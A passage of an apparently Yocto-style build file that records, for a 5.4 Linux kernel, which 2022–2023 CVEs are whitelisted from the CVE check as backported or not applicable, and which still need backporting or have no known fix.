6826# cpe-stable-backport: Backported in 5.4.176
6827CVE_CHECK_WHITELIST += "CVE-2022-24959"
6828
6829# cpe-stable-backport: Backported in 5.4.197
6830CVE_CHECK_WHITELIST += "CVE-2022-2503"
6831
6832# cpe-stable-backport: Backported in 5.4.180
6833CVE_CHECK_WHITELIST += "CVE-2022-25258"
6834
6835# CVE-2022-25265 has no known resolution
6836
6837# cpe-stable-backport: Backported in 5.4.180
6838CVE_CHECK_WHITELIST += "CVE-2022-25375"
6839
6840# cpe-stable-backport: Backported in 5.4.182
6841CVE_CHECK_WHITELIST += "CVE-2022-25636"
6842
6843# fixed-version: only affects 5.7rc1 onwards
6844CVE_CHECK_WHITELIST += "CVE-2022-2585"
6845
6846# cpe-stable-backport: Backported in 5.4.211
6847CVE_CHECK_WHITELIST += "CVE-2022-2586"
6848
6849# cpe-stable-backport: Backported in 5.4.211
6850CVE_CHECK_WHITELIST += "CVE-2022-2588"
6851
6852# fixed-version: only affects 5.16rc1 onwards
6853CVE_CHECK_WHITELIST += "CVE-2022-2590"
6854
6855# cpe-stable-backport: Backported in 5.4.220
6856CVE_CHECK_WHITELIST += "CVE-2022-2602"
6857
6858# cpe-stable-backport: Backported in 5.4.204
6859CVE_CHECK_WHITELIST += "CVE-2022-26365"
6860
6861# cpe-stable-backport: Backported in 5.4.210
6862CVE_CHECK_WHITELIST += "CVE-2022-26373"
6863
6864# cpe-stable-backport: Backported in 5.4.191
6865CVE_CHECK_WHITELIST += "CVE-2022-2639"
6866
6867# cpe-stable-backport: Backported in 5.4.188
6868CVE_CHECK_WHITELIST += "CVE-2022-26490"
6869
6870# cpe-stable-backport: Backported in 5.4.213
6871CVE_CHECK_WHITELIST += "CVE-2022-2663"
6872
6873# CVE-2022-26878 has no known resolution
6874
6875# cpe-stable-backport: Backported in 5.4.182
6876CVE_CHECK_WHITELIST += "CVE-2022-26966"
6877
6878# cpe-stable-backport: Backported in 5.4.182
6879CVE_CHECK_WHITELIST += "CVE-2022-27223"
6880
6881# cpe-stable-backport: Backported in 5.4.188
6882CVE_CHECK_WHITELIST += "CVE-2022-27666"
6883
6884# CVE-2022-27672 needs backporting (fixed from 6.2)
6885
6886# fixed-version: only affects 5.18rc1 onwards
6887CVE_CHECK_WHITELIST += "CVE-2022-2785"
6888
6889# fixed-version: only affects 5.15rc1 onwards
6890CVE_CHECK_WHITELIST += "CVE-2022-27950"
6891
6892# cpe-stable-backport: Backported in 5.4.188
6893CVE_CHECK_WHITELIST += "CVE-2022-28356"
6894
6895# cpe-stable-backport: Backported in 5.4.191
6896CVE_CHECK_WHITELIST += "CVE-2022-28388"
6897
6898# cpe-stable-backport: Backported in 5.4.189
6899CVE_CHECK_WHITELIST += "CVE-2022-28389"
6900
6901# cpe-stable-backport: Backported in 5.4.189
6902CVE_CHECK_WHITELIST += "CVE-2022-28390"
6903
6904# fixed-version: only affects 5.11rc1 onwards
6905CVE_CHECK_WHITELIST += "CVE-2022-2873"
6906
6907# fixed-version: only affects 5.17rc3 onwards
6908CVE_CHECK_WHITELIST += "CVE-2022-28796"
6909
6910# cpe-stable-backport: Backported in 5.4.196
6911CVE_CHECK_WHITELIST += "CVE-2022-28893"
6912
6913# fixed-version: only affects 5.5rc1 onwards
6914CVE_CHECK_WHITELIST += "CVE-2022-2905"
6915
6916# fixed-version: only affects 5.12rc1 onwards
6917CVE_CHECK_WHITELIST += "CVE-2022-29156"
6918
6919# cpe-stable-backport: Backported in 5.4.177
6920CVE_CHECK_WHITELIST += "CVE-2022-2938"
6921
6922# cpe-stable-backport: Backported in 5.4.191
6923CVE_CHECK_WHITELIST += "CVE-2022-29581"
6924
6925# fixed-version: only affects 5.5rc1 onwards
6926CVE_CHECK_WHITELIST += "CVE-2022-29582"
6927
6928# fixed-version: only affects 5.8rc1 onwards
6929CVE_CHECK_WHITELIST += "CVE-2022-2959"
6930
6931# CVE-2022-2961 has no known resolution
6932
6933# cpe-stable-backport: Backported in 5.4.180
6934CVE_CHECK_WHITELIST += "CVE-2022-2964"
6935
6936# cpe-stable-backport: Backported in 5.4.189
6937CVE_CHECK_WHITELIST += "CVE-2022-2977"
6938
6939# cpe-stable-backport: Backported in 5.4.218
6940CVE_CHECK_WHITELIST += "CVE-2022-2978"
6941
6942# cpe-stable-backport: Backported in 5.4.217
6943CVE_CHECK_WHITELIST += "CVE-2022-29900"
6944
6945# cpe-stable-backport: Backported in 5.4.217
6946CVE_CHECK_WHITELIST += "CVE-2022-29901"
6947
6948# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
6949
6950# fixed-version: only affects 5.16rc1 onwards
6951CVE_CHECK_WHITELIST += "CVE-2022-29968"
6952
6953# cpe-stable-backport: Backported in 5.4.212
6954CVE_CHECK_WHITELIST += "CVE-2022-3028"
6955
6956# cpe-stable-backport: Backported in 5.4.189
6957CVE_CHECK_WHITELIST += "CVE-2022-30594"
6958
6959# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
6960
6961# fixed-version: only affects 5.11rc1 onwards
6962CVE_CHECK_WHITELIST += "CVE-2022-3077"
6963
6964# fixed-version: only affects 5.10rc1 onwards
6965CVE_CHECK_WHITELIST += "CVE-2022-3078"
6966
6967# fixed-version: only affects 6.0rc1 onwards
6968CVE_CHECK_WHITELIST += "CVE-2022-3103"
6969
6970# fixed-version: only affects 5.7rc1 onwards
6971CVE_CHECK_WHITELIST += "CVE-2022-3104"
6972
6973# cpe-stable-backport: Backported in 5.4.171
6974CVE_CHECK_WHITELIST += "CVE-2022-3105"
6975
6976# fixed-version: only affects 5.9rc1 onwards
6977CVE_CHECK_WHITELIST += "CVE-2022-3106"
6978
6979# cpe-stable-backport: Backported in 5.4.187
6980CVE_CHECK_WHITELIST += "CVE-2022-3107"
6981
6982# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
6983
6984# fixed-version: only affects 5.15rc1 onwards
6985CVE_CHECK_WHITELIST += "CVE-2022-3110"
6986
6987# cpe-stable-backport: Backported in 5.4.189
6988CVE_CHECK_WHITELIST += "CVE-2022-3111"
6989
6990# fixed-version: only affects 5.7rc1 onwards
6991CVE_CHECK_WHITELIST += "CVE-2022-3112"
6992
6993# fixed-version: only affects 5.10rc6 onwards
6994CVE_CHECK_WHITELIST += "CVE-2022-3113"
6995
6996# fixed-version: only affects 5.13rc1 onwards
6997CVE_CHECK_WHITELIST += "CVE-2022-3114"
6998
6999# cpe-stable-backport: Backported in 5.4.198
7000CVE_CHECK_WHITELIST += "CVE-2022-3115"
7001
7002# cpe-stable-backport: Backported in 5.4.226
7003CVE_CHECK_WHITELIST += "CVE-2022-3169"
7004
7005# fixed-version: only affects 6.0rc1 onwards
7006CVE_CHECK_WHITELIST += "CVE-2022-3170"
7007
7008# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
7009
7010# cpe-stable-backport: Backported in 5.4.189
7011CVE_CHECK_WHITELIST += "CVE-2022-3202"
7012
7013# cpe-stable-backport: Backported in 5.4.198
7014CVE_CHECK_WHITELIST += "CVE-2022-32250"
7015
7016# cpe-stable-backport: Backported in 5.4.201
7017CVE_CHECK_WHITELIST += "CVE-2022-32296"
7018
7019# CVE-2022-3238 has no known resolution
7020
7021# cpe-stable-backport: Backported in 5.4.189
7022CVE_CHECK_WHITELIST += "CVE-2022-3239"
7023
7024# cpe-stable-backport: Backported in 5.4.198
7025CVE_CHECK_WHITELIST += "CVE-2022-32981"
7026
7027# cpe-stable-backport: Backported in 5.4.215
7028CVE_CHECK_WHITELIST += "CVE-2022-3303"
7029
7030# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
7031
7032# cpe-stable-backport: Backported in 5.4.204
7033CVE_CHECK_WHITELIST += "CVE-2022-33740"
7034
7035# cpe-stable-backport: Backported in 5.4.204
7036CVE_CHECK_WHITELIST += "CVE-2022-33741"
7037
7038# cpe-stable-backport: Backported in 5.4.204
7039CVE_CHECK_WHITELIST += "CVE-2022-33742"
7040
7041# fixed-version: only affects 5.9rc1 onwards
7042CVE_CHECK_WHITELIST += "CVE-2022-33743"
7043
7044# cpe-stable-backport: Backported in 5.4.204
7045CVE_CHECK_WHITELIST += "CVE-2022-33744"
7046
7047# cpe-stable-backport: Backported in 5.4.192
7048CVE_CHECK_WHITELIST += "CVE-2022-33981"
7049
7050# cpe-stable-backport: Backported in 5.4.229
7051CVE_CHECK_WHITELIST += "CVE-2022-3424"
7052
7053# fixed-version: only affects 5.18rc2 onwards
7054CVE_CHECK_WHITELIST += "CVE-2022-3435"
7055
7056# fixed-version: only affects 5.13rc1 onwards
7057CVE_CHECK_WHITELIST += "CVE-2022-34494"
7058
7059# fixed-version: only affects 5.13rc1 onwards
7060CVE_CHECK_WHITELIST += "CVE-2022-34495"
7061
7062# cpe-stable-backport: Backported in 5.4.244
7063CVE_CHECK_WHITELIST += "CVE-2022-34918"
7064
7065# cpe-stable-backport: Backported in 5.4.225
7066CVE_CHECK_WHITELIST += "CVE-2022-3521"
7067
7068# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
7069
7070# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
7071
7072# cpe-stable-backport: Backported in 5.4.224
7073CVE_CHECK_WHITELIST += "CVE-2022-3524"
7074
7075# fixed-version: only affects 5.13rc1 onwards
7076CVE_CHECK_WHITELIST += "CVE-2022-3526"
7077
7078# fixed-version: only affects 5.19rc1 onwards
7079CVE_CHECK_WHITELIST += "CVE-2022-3531"
7080
7081# fixed-version: only affects 6.1rc1 onwards
7082CVE_CHECK_WHITELIST += "CVE-2022-3532"
7083
7084# CVE-2022-3533 has no known resolution
7085
7086# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
7087
7088# cpe-stable-backport: Backported in 5.4.220
7089CVE_CHECK_WHITELIST += "CVE-2022-3535"
7090
7091# fixed-version: only affects 5.19rc1 onwards
7092CVE_CHECK_WHITELIST += "CVE-2022-3541"
7093
7094# cpe-stable-backport: Backported in 5.4.220
7095CVE_CHECK_WHITELIST += "CVE-2022-3542"
7096
7097# fixed-version: only affects 5.15rc1 onwards
7098CVE_CHECK_WHITELIST += "CVE-2022-3543"
7099
7100# CVE-2022-3544 has no known resolution
7101
7102# cpe-stable-backport: Backported in 5.4.228
7103CVE_CHECK_WHITELIST += "CVE-2022-3545"
7104
7105# cpe-stable-backport: Backported in 5.4.224
7106CVE_CHECK_WHITELIST += "CVE-2022-3564"
7107
7108# cpe-stable-backport: Backported in 5.4.220
7109CVE_CHECK_WHITELIST += "CVE-2022-3565"
7110
7111# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
7112
7113# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
7114
7115# cpe-stable-backport: Backported in 5.4.198
7116CVE_CHECK_WHITELIST += "CVE-2022-3577"
7117
7118# cpe-stable-backport: Backported in 5.4.213
7119CVE_CHECK_WHITELIST += "CVE-2022-3586"
7120
7121# cpe-stable-backport: Backported in 5.4.220
7122CVE_CHECK_WHITELIST += "CVE-2022-3594"
7123
7124# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
7125
7126# CVE-2022-3606 has no known resolution
7127
7128# cpe-stable-backport: Backported in 5.4.207
7129CVE_CHECK_WHITELIST += "CVE-2022-36123"
7130
7131# fixed-version: only affects 5.12rc1 onwards
7132CVE_CHECK_WHITELIST += "CVE-2022-3619"
7133
7134# cpe-stable-backport: Backported in 5.4.218
7135CVE_CHECK_WHITELIST += "CVE-2022-3621"
7136
7137# cpe-stable-backport: Backported in 5.4.228
7138CVE_CHECK_WHITELIST += "CVE-2022-3623"
7139
7140# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
7141
7142# cpe-stable-backport: Backported in 5.4.211
7143CVE_CHECK_WHITELIST += "CVE-2022-3625"
7144
7145# cpe-stable-backport: Backported in 5.4.224
7146CVE_CHECK_WHITELIST += "CVE-2022-3628"
7147
7148# cpe-stable-backport: Backported in 5.4.229
7149CVE_CHECK_WHITELIST += "CVE-2022-36280"
7150
7151# cpe-stable-backport: Backported in 5.4.211
7152CVE_CHECK_WHITELIST += "CVE-2022-3629"
7153
7154# fixed-version: only affects 5.19rc6 onwards
7155CVE_CHECK_WHITELIST += "CVE-2022-3630"
7156
7157# cpe-stable-backport: Backported in 5.4.211
7158CVE_CHECK_WHITELIST += "CVE-2022-3633"
7159
7160# cpe-stable-backport: Backported in 5.4.211
7161CVE_CHECK_WHITELIST += "CVE-2022-3635"
7162
7163# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
7164
7165# fixed-version: only affects 5.19 onwards
7166CVE_CHECK_WHITELIST += "CVE-2022-3640"
7167
7168# CVE-2022-36402 needs backporting (fixed from 6.5)
7169
7170# CVE-2022-3642 has no known resolution
7171
7172# cpe-stable-backport: Backported in 5.4.227
7173CVE_CHECK_WHITELIST += "CVE-2022-3643"
7174
7175# cpe-stable-backport: Backported in 5.4.218
7176CVE_CHECK_WHITELIST += "CVE-2022-3646"
7177
7178# cpe-stable-backport: Backported in 5.4.220
7179CVE_CHECK_WHITELIST += "CVE-2022-3649"
7180
7181# cpe-stable-backport: Backported in 5.4.208
7182CVE_CHECK_WHITELIST += "CVE-2022-36879"
7183
7184# cpe-stable-backport: Backported in 5.4.209
7185CVE_CHECK_WHITELIST += "CVE-2022-36946"
7186
7187# cpe-stable-backport: Backported in 5.4.233
7188CVE_CHECK_WHITELIST += "CVE-2022-3707"
7189
7190# CVE-2022-38096 has no known resolution
7191
7192# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
7193
7194# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
7195
7196# fixed-version: only affects 5.18 onwards
7197CVE_CHECK_WHITELIST += "CVE-2022-3910"
7198
7199# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
7200
7201# cpe-stable-backport: Backported in 5.4.244
7202CVE_CHECK_WHITELIST += "CVE-2022-39189"
7203
7204# fixed-version: only affects 5.9rc1 onwards
7205CVE_CHECK_WHITELIST += "CVE-2022-39190"
7206
7207# fixed-version: only affects 5.18rc1 onwards
7208CVE_CHECK_WHITELIST += "CVE-2022-3977"
7209
7210# cpe-stable-backport: Backported in 5.4.215
7211CVE_CHECK_WHITELIST += "CVE-2022-39842"
7212
7213# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
7214
7215# cpe-stable-backport: Backported in 5.4.213
7216CVE_CHECK_WHITELIST += "CVE-2022-40307"
7217
7218# fixed-version: only affects 5.19rc1 onwards
7219CVE_CHECK_WHITELIST += "CVE-2022-40476"
7220
7221# cpe-stable-backport: Backported in 5.4.218
7222CVE_CHECK_WHITELIST += "CVE-2022-40768"
7223
7224# cpe-stable-backport: Backported in 5.4.213
7225CVE_CHECK_WHITELIST += "CVE-2022-4095"
7226
7227# cpe-stable-backport: Backported in 5.4.252
7228CVE_CHECK_WHITELIST += "CVE-2022-40982"
7229
7230# cpe-stable-backport: Backported in 5.4.229
7231CVE_CHECK_WHITELIST += "CVE-2022-41218"
7232
7233# cpe-stable-backport: Backported in 5.4.211
7234CVE_CHECK_WHITELIST += "CVE-2022-41222"
7235
7236# fixed-version: only affects 5.19rc1 onwards
7237CVE_CHECK_WHITELIST += "CVE-2022-4127"
7238
7239# fixed-version: only affects 5.17rc1 onwards
7240CVE_CHECK_WHITELIST += "CVE-2022-4128"
7241
7242# cpe-stable-backport: Backported in 5.4.231
7243CVE_CHECK_WHITELIST += "CVE-2022-4129"
7244
7245# fixed-version: only affects 5.17rc2 onwards
7246CVE_CHECK_WHITELIST += "CVE-2022-4139"
7247
7248# cpe-stable-backport: Backported in 5.4.218
7249CVE_CHECK_WHITELIST += "CVE-2022-41674"
7250
7251# CVE-2022-41848 has no known resolution
7252
7253# cpe-stable-backport: Backported in 5.4.220
7254CVE_CHECK_WHITELIST += "CVE-2022-41849"
7255
7256# cpe-stable-backport: Backported in 5.4.220
7257CVE_CHECK_WHITELIST += "CVE-2022-41850"
7258
7259# cpe-stable-backport: Backported in 5.4.190
7260CVE_CHECK_WHITELIST += "CVE-2022-41858"
7261
7262# fixed-version: only affects 5.16rc7 onwards
7263CVE_CHECK_WHITELIST += "CVE-2022-42328"
7264
7265# fixed-version: only affects 5.16rc7 onwards
7266CVE_CHECK_WHITELIST += "CVE-2022-42329"
7267
7268# cpe-stable-backport: Backported in 5.4.215
7269CVE_CHECK_WHITELIST += "CVE-2022-42432"
7270
7271# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
7272
7273# cpe-stable-backport: Backported in 5.4.212
7274CVE_CHECK_WHITELIST += "CVE-2022-42703"
7275
7276# cpe-stable-backport: Backported in 5.4.219
7277CVE_CHECK_WHITELIST += "CVE-2022-42719"
7278
7279# cpe-stable-backport: Backported in 5.4.218
7280CVE_CHECK_WHITELIST += "CVE-2022-42720"
7281
7282# cpe-stable-backport: Backported in 5.4.218
7283CVE_CHECK_WHITELIST += "CVE-2022-42721"
7284
7285# fixed-version: only affects 5.8rc1 onwards
7286CVE_CHECK_WHITELIST += "CVE-2022-42722"
7287
7288# cpe-stable-backport: Backported in 5.4.224
7289CVE_CHECK_WHITELIST += "CVE-2022-42895"
7290
7291# cpe-stable-backport: Backported in 5.4.226
7292CVE_CHECK_WHITELIST += "CVE-2022-42896"
7293
7294# cpe-stable-backport: Backported in 5.4.218
7295CVE_CHECK_WHITELIST += "CVE-2022-43750"
7296
7297# fixed-version: only affects 5.8rc1 onwards
7298CVE_CHECK_WHITELIST += "CVE-2022-4378"
7299
7300# fixed-version: only affects 5.6rc1 onwards
7301CVE_CHECK_WHITELIST += "CVE-2022-4379"
7302
7303# cpe-stable-backport: Backported in 5.4.230
7304CVE_CHECK_WHITELIST += "CVE-2022-4382"
7305
7306# fixed-version: only affects 5.11rc1 onwards
7307CVE_CHECK_WHITELIST += "CVE-2022-43945"
7308
7309# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
7310
7311# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
7312
7313# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
7314
7315# CVE-2022-4543 has no known resolution
7316
7317# fixed-version: only affects 5.12rc1 onwards
7318CVE_CHECK_WHITELIST += "CVE-2022-45869"
7319
7320# CVE-2022-45884 has no known resolution
7321
7322# CVE-2022-45885 has no known resolution
7323
7324# cpe-stable-backport: Backported in 5.4.246
7325CVE_CHECK_WHITELIST += "CVE-2022-45886"
7326
7327# cpe-stable-backport: Backported in 5.4.246
7328CVE_CHECK_WHITELIST += "CVE-2022-45887"
7329
7330# fixed-version: only affects 5.14rc1 onwards
7331CVE_CHECK_WHITELIST += "CVE-2022-45888"
7332
7333# cpe-stable-backport: Backported in 5.4.246
7334CVE_CHECK_WHITELIST += "CVE-2022-45919"
7335
7336# cpe-stable-backport: Backported in 5.4.229
7337CVE_CHECK_WHITELIST += "CVE-2022-45934"
7338
7339# cpe-stable-backport: Backported in 5.4.213
7340CVE_CHECK_WHITELIST += "CVE-2022-4662"
7341
7342# fixed-version: only affects 5.10rc1 onwards
7343CVE_CHECK_WHITELIST += "CVE-2022-4696"
7344
7345# cpe-stable-backport: Backported in 5.4.240
7346CVE_CHECK_WHITELIST += "CVE-2022-4744"
7347
7348# fixed-version: only affects 5.7rc1 onwards
7349CVE_CHECK_WHITELIST += "CVE-2022-47518"
7350
7351# fixed-version: only affects 5.7rc1 onwards
7352CVE_CHECK_WHITELIST += "CVE-2022-47519"
7353
7354# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
7355
7356# fixed-version: only affects 5.7rc1 onwards
7357CVE_CHECK_WHITELIST += "CVE-2022-47521"
7358
7359# cpe-stable-backport: Backported in 5.4.229
7360CVE_CHECK_WHITELIST += "CVE-2022-47929"
7361
7362# fixed-version: only affects 5.15rc1 onwards
7363CVE_CHECK_WHITELIST += "CVE-2022-47938"
7364
7365# fixed-version: only affects 5.15rc1 onwards
7366CVE_CHECK_WHITELIST += "CVE-2022-47939"
7367
7368# fixed-version: only affects 5.15rc1 onwards
7369CVE_CHECK_WHITELIST += "CVE-2022-47940"
7370
7371# fixed-version: only affects 5.15rc1 onwards
7372CVE_CHECK_WHITELIST += "CVE-2022-47941"
7373
7374# fixed-version: only affects 5.15rc1 onwards
7375CVE_CHECK_WHITELIST += "CVE-2022-47942"
7376
7377# fixed-version: only affects 5.15rc1 onwards
7378CVE_CHECK_WHITELIST += "CVE-2022-47943"
7379
7380# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
7381
7382# fixed-version: only affects 5.15rc1 onwards
7383CVE_CHECK_WHITELIST += "CVE-2022-4842"
7384
7385# fixed-version: only affects 5.15rc1 onwards
7386CVE_CHECK_WHITELIST += "CVE-2022-48423"
7387
7388# fixed-version: only affects 5.15rc1 onwards
7389CVE_CHECK_WHITELIST += "CVE-2022-48424"
7390
7391# fixed-version: only affects 5.15rc1 onwards
7392CVE_CHECK_WHITELIST += "CVE-2022-48425"
7393
7394# fixed-version: only affects 5.15rc1 onwards
7395CVE_CHECK_WHITELIST += "CVE-2022-48502"
7396
7397# cpe-stable-backport: Backported in 5.4.196
7398CVE_CHECK_WHITELIST += "CVE-2022-48619"
7399
7400# cpe-stable-backport: Backported in 5.4.179
7401CVE_CHECK_WHITELIST += "CVE-2022-48626"
7402
7403# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
7404
7405# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
7406
7407# cpe-stable-backport: Backported in 5.4.187
7408CVE_CHECK_WHITELIST += "CVE-2022-48629"
7409
7410# fixed-version: only affects 5.17 onwards
7411CVE_CHECK_WHITELIST += "CVE-2022-48630"
7412
7413# fixed-version: Fixed after version 5.0rc1
7414CVE_CHECK_WHITELIST += "CVE-2023-0030"
7415
7416# cpe-stable-backport: Backported in 5.4.229
7417CVE_CHECK_WHITELIST += "CVE-2023-0045"
7418
7419# cpe-stable-backport: Backported in 5.4.160
7420CVE_CHECK_WHITELIST += "CVE-2023-0047"
7421
7422# fixed-version: only affects 6.0rc1 onwards
7423CVE_CHECK_WHITELIST += "CVE-2023-0122"
7424
7425# cpe-stable-backport: Backported in 5.4.243
7426CVE_CHECK_WHITELIST += "CVE-2023-0160"
7427
7428# fixed-version: only affects 5.5rc1 onwards
7429CVE_CHECK_WHITELIST += "CVE-2023-0179"
7430
7431# fixed-version: only affects 5.15rc1 onwards
7432CVE_CHECK_WHITELIST += "CVE-2023-0210"
7433
7434# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
7435
7436# cpe-stable-backport: Backported in 5.4.229
7437CVE_CHECK_WHITELIST += "CVE-2023-0266"
7438
7439# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
7440
7441# cpe-stable-backport: Backported in 5.4.229
7442CVE_CHECK_WHITELIST += "CVE-2023-0394"
7443
7444# cpe-stable-backport: Backported in 5.4.230
7445CVE_CHECK_WHITELIST += "CVE-2023-0458"
7446
7447# cpe-stable-backport: Backported in 5.4.233
7448CVE_CHECK_WHITELIST += "CVE-2023-0459"
7449
7450# cpe-stable-backport: Backported in 5.4.229
7451CVE_CHECK_WHITELIST += "CVE-2023-0461"
7452
7453# fixed-version: only affects 5.17rc1 onwards
7454CVE_CHECK_WHITELIST += "CVE-2023-0468"
7455
7456# fixed-version: only affects 5.19rc1 onwards
7457CVE_CHECK_WHITELIST += "CVE-2023-0469"
7458
7459# cpe-stable-backport: Backported in 5.4.240
7460CVE_CHECK_WHITELIST += "CVE-2023-0590"
7461
7462# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
7463
7464# cpe-stable-backport: Backported in 5.4.223
7465CVE_CHECK_WHITELIST += "CVE-2023-0615"
7466
7467# fixed-version: only affects 5.19rc1 onwards
7468CVE_CHECK_WHITELIST += "CVE-2023-1032"
7469
7470# cpe-stable-backport: Backported in 5.4.231
7471CVE_CHECK_WHITELIST += "CVE-2023-1073"
7472
7473# cpe-stable-backport: Backported in 5.4.231
7474CVE_CHECK_WHITELIST += "CVE-2023-1074"
7475
7476# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
7477
7478# cpe-stable-backport: Backported in 5.4.235
7479CVE_CHECK_WHITELIST += "CVE-2023-1076"
7480
7481# cpe-stable-backport: Backported in 5.4.235
7482CVE_CHECK_WHITELIST += "CVE-2023-1077"
7483
7484# cpe-stable-backport: Backported in 5.4.232
7485CVE_CHECK_WHITELIST += "CVE-2023-1078"
7486
7487# cpe-stable-backport: Backported in 5.4.235
7488CVE_CHECK_WHITELIST += "CVE-2023-1079"
7489
7490# cpe-stable-backport: Backported in 5.4.211
7491CVE_CHECK_WHITELIST += "CVE-2023-1095"
7492
7493# cpe-stable-backport: Backported in 5.4.235
7494CVE_CHECK_WHITELIST += "CVE-2023-1118"
7495
7496# fixed-version: only affects 5.15rc1 onwards
7497CVE_CHECK_WHITELIST += "CVE-2023-1192"
7498
7499# fixed-version: only affects 5.15rc1 onwards
7500CVE_CHECK_WHITELIST += "CVE-2023-1193"
7501
7502# fixed-version: only affects 5.15rc1 onwards
7503CVE_CHECK_WHITELIST += "CVE-2023-1194"
7504
7505# fixed-version: only affects 5.16rc1 onwards
7506CVE_CHECK_WHITELIST += "CVE-2023-1195"
7507
7508# cpe-stable-backport: Backported in 5.4.253
7509CVE_CHECK_WHITELIST += "CVE-2023-1206"
7510
7511# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
7512
7513# fixed-version: only affects 5.6rc1 onwards
7514CVE_CHECK_WHITELIST += "CVE-2023-1252"
7515
7516# CVE-2023-1281 needs backporting (fixed from 6.2)
7517
7518# fixed-version: only affects 5.6rc1 onwards
7519CVE_CHECK_WHITELIST += "CVE-2023-1295"
7520
7521# cpe-stable-backport: Backported in 5.4.243
7522CVE_CHECK_WHITELIST += "CVE-2023-1380"
7523
7524# cpe-stable-backport: Backported in 5.4.226
7525CVE_CHECK_WHITELIST += "CVE-2023-1382"
7526
7527# cpe-stable-backport: Backported in 5.4.92
7528CVE_CHECK_WHITELIST += "CVE-2023-1390"
7529
7530# CVE-2023-1476 has no known resolution
7531
7532# cpe-stable-backport: Backported in 5.4.232
7533CVE_CHECK_WHITELIST += "CVE-2023-1513"
7534
7535# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
7536
7537# fixed-version: only affects 5.19rc1 onwards
7538CVE_CHECK_WHITELIST += "CVE-2023-1583"
7539
7540# cpe-stable-backport: Backported in 5.4.253
7541CVE_CHECK_WHITELIST += "CVE-2023-1611"
7542
7543# cpe-stable-backport: Backported in 5.4.189
7544CVE_CHECK_WHITELIST += "CVE-2023-1637"
7545
7546# fixed-version: only affects 5.14rc1 onwards
7547CVE_CHECK_WHITELIST += "CVE-2023-1652"
7548
7549# cpe-stable-backport: Backported in 5.4.240
7550CVE_CHECK_WHITELIST += "CVE-2023-1670"
7551
7552# cpe-stable-backport: Backported in 5.4.235
7553CVE_CHECK_WHITELIST += "CVE-2023-1829"
7554
7555# cpe-stable-backport: Backported in 5.4.196
7556CVE_CHECK_WHITELIST += "CVE-2023-1838"
7557
7558# cpe-stable-backport: Backported in 5.4.238
7559CVE_CHECK_WHITELIST += "CVE-2023-1855"
7560
7561# cpe-stable-backport: Backported in 5.4.241
7562CVE_CHECK_WHITELIST += "CVE-2023-1859"
7563
7564# fixed-version: only affects 5.7rc1 onwards
7565CVE_CHECK_WHITELIST += "CVE-2023-1872"
7566
7567# cpe-stable-backport: Backported in 5.4.240
7568CVE_CHECK_WHITELIST += "CVE-2023-1989"
7569
7570# cpe-stable-backport: Backported in 5.4.238
7571CVE_CHECK_WHITELIST += "CVE-2023-1990"
7572
7573# fixed-version: only affects 5.19rc7 onwards
7574CVE_CHECK_WHITELIST += "CVE-2023-1998"
7575
7576# cpe-stable-backport: Backported in 5.4.243
7577CVE_CHECK_WHITELIST += "CVE-2023-2002"
7578
7579# fixed-version: only affects 5.10rc1 onwards
7580CVE_CHECK_WHITELIST += "CVE-2023-2006"
7581
7582# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
7583
7584# cpe-stable-backport: Backported in 5.4.202
7585CVE_CHECK_WHITELIST += "CVE-2023-2008"
7586
7587# fixed-version: only affects 5.12rc1 onwards
7588CVE_CHECK_WHITELIST += "CVE-2023-2019"
7589
7590# cpe-stable-backport: Backported in 5.4.252
7591CVE_CHECK_WHITELIST += "CVE-2023-20569"
7592
7593# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
7594
7595# cpe-stable-backport: Backported in 5.4.250
7596CVE_CHECK_WHITELIST += "CVE-2023-20593"
7597
7598# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
7599
7600# CVE-2023-20937 has no known resolution
7601
7602# fixed-version: only affects 5.17rc1 onwards
7603CVE_CHECK_WHITELIST += "CVE-2023-20938"
7604
7605# CVE-2023-20941 has no known resolution
7606
7607# fixed-version: only affects 5.14rc1 onwards
7608CVE_CHECK_WHITELIST += "CVE-2023-21102"
7609
7610# fixed-version: only affects 5.19rc1 onwards
7611CVE_CHECK_WHITELIST += "CVE-2023-21106"
7612
7613# cpe-stable-backport: Backported in 5.4.249
7614CVE_CHECK_WHITELIST += "CVE-2023-2124"
7615
7616# fixed-version: only affects 5.16rc1 onwards
7617CVE_CHECK_WHITELIST += "CVE-2023-21255"
7618
7619# fixed-version: only affects 5.17rc1 onwards
7620CVE_CHECK_WHITELIST += "CVE-2023-21264"
7621
7622# CVE-2023-21400 has no known resolution
7623
7624# fixed-version: only affects 5.7rc1 onwards
7625CVE_CHECK_WHITELIST += "CVE-2023-2156"
7626
7627# cpe-stable-backport: Backported in 5.4.232
7628CVE_CHECK_WHITELIST += "CVE-2023-2162"
7629
7630# cpe-stable-backport: Backported in 5.4.242
7631CVE_CHECK_WHITELIST += "CVE-2023-2163"
7632
7633# fixed-version: only affects 5.12rc1 onwards
